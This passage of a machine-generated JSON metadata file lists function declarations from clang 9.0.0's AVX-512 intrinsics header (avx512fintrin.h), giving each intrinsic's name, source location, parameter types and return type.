"/usr/lib/clang/9.0.0/include/avx512fintrin.h:7212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7233:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7241:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7247:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7255:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7262:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7270:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7276:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7299:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7305:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7313:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7320:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7328:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7334:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7342:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7349:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7357:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7542:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7551:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7560:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7584:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7593:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_fmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7787:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7809:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7825:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_fmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7841:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7863:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7879:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_fnmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7895:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fnmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7917:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fnmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7933:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_fnmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7949:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fnmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7971:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fnmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7987:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_fmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8003:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8025:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8041:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_fmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8057:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8079:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8095:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_fnmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8111:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fnmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8133:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fnmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8149:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_fnmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fnmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fnmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_permutexvar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8246:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_permutexvar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8252:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_permutexvar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8260:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_permutexvar_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8268:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutexvar_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8274:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutexvar_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8282:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_permutexvar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_permutexvar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8297:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_permutexvar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8305:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_permutexvar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8313:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutexvar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8321:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutexvar_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8329:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_kand", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8340:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_kandn", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8346:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_kor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8352:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_kortestc", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8358:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_kortestz", "ns": 0, "location": 